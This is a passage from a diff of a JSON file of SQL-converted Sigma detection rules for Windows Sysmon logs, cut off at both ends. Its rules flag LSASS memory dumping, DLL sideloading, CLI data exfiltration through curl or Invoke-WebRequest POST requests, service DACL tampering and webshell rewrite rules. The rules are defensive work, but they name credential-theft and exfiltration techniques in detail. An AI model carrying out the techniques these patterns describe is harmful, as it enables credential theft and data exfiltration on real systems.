'\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.impact", + "attack.t1529" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": 
"857c8db3-c89b-42fb-882b-f681c7cf4da2", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Valid user connecting using RDP" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. 
John, OTR (Open Threat Research)", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "False positives depend on custom use of vsls-agent.exe" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' 
OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Alternate PowerShell Hosts - Image", - "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", + "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "status": "experimental", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of appcmd to add new URL rewrite rules" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_alternate_powershell_hosts_moduleload.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ - "Very unlikely" + "Legitimate usage of the script. 
Always investigate what's being registered to confirm if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 
'%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "status": "experimental", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1047" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_recon_service.yml" + }, + { + "title": "Indirect Command Execution By Program Compatibility Wizard", + "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "status": "test", + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "author": "A. Sungurov , oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_pcwrun.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Change Default File Association Via Assoc", + "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Admin activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_cmd_assoc_execution.yml" }, { - "title": "System Drawing DLL Load", - "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "status": "experimental", - "description": "Detects processes loading \"System.Drawing.ni.dll\". 
This could be an indicator of potential Screen Capture.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_dll_system_drawing_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file 
